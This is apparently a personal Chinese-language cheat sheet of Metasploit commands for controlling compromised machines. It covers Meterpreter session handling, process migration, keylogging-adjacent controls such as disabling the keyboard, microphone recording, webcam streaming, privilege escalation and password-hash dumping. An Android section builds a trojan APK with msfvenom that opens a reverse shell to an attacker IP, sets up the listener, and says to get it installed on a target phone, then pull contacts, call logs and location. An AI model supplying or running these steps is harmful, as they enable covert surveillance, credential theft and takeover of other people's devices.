【记录】metasploit总结

sessions -l 查看会话

backgroud 暂时退出当前会话

注入进程：
ps 查看进程
migrate 注入进程 进程ID 一般选择explorer.exe对应的PID
run vnc 查看远程桌面

文件操作
cat 查看文件
edit 编辑文件
upload 上传文件
download 下载文件
rm 删除文件
mkdir 创建文件夹
rmdir 删除文件夹

网络及系统操作
enumdesktops 在线用户数
uictl disable keyboard 让键盘失效
uictl enable keyboard 恢复键盘
record_mic -d 10 音频录制 录制10秒
webcam_stream 开启摄像头
getsystem 获取最高权限
hashdump 密码hash

安卓

制作木马kali_linux_2017.1_vm_amd64虚机中

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.18.250 LPORT=12345 R > test.apk

进入msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp 

set LHOST 192.168.18.250

set LPORT 12345

exploit

将test.apk发送到目标手机安装运行即可

常用命令：
search 搜索 search -f *.jpg 😄
download
webcam_stream -i 1/2 打开前置或后置摄像头
check_root 检测root
dump_calllog 下载电话记录
dump_contacts 下载信息记录
geolocate 定位，需要下载谷歌地图

 

kali开启ssh

1、vim /etc/ssh/sshd_config 添加 PermitRootLogin yes

2、开启ssh服务 service ssh start

metasploit
msfconsole下启动nmap进行端口扫描
msf > nmap -v sV IP
msf > search portscan
msf > use auxiliary/scanner/portscan/syn
msf > use auxiliary/scanner/portscan/tcp
msf > use auxiliary/scanner/smb/smb_version

msf > use auxiliary/scanner/ftp/ftp_version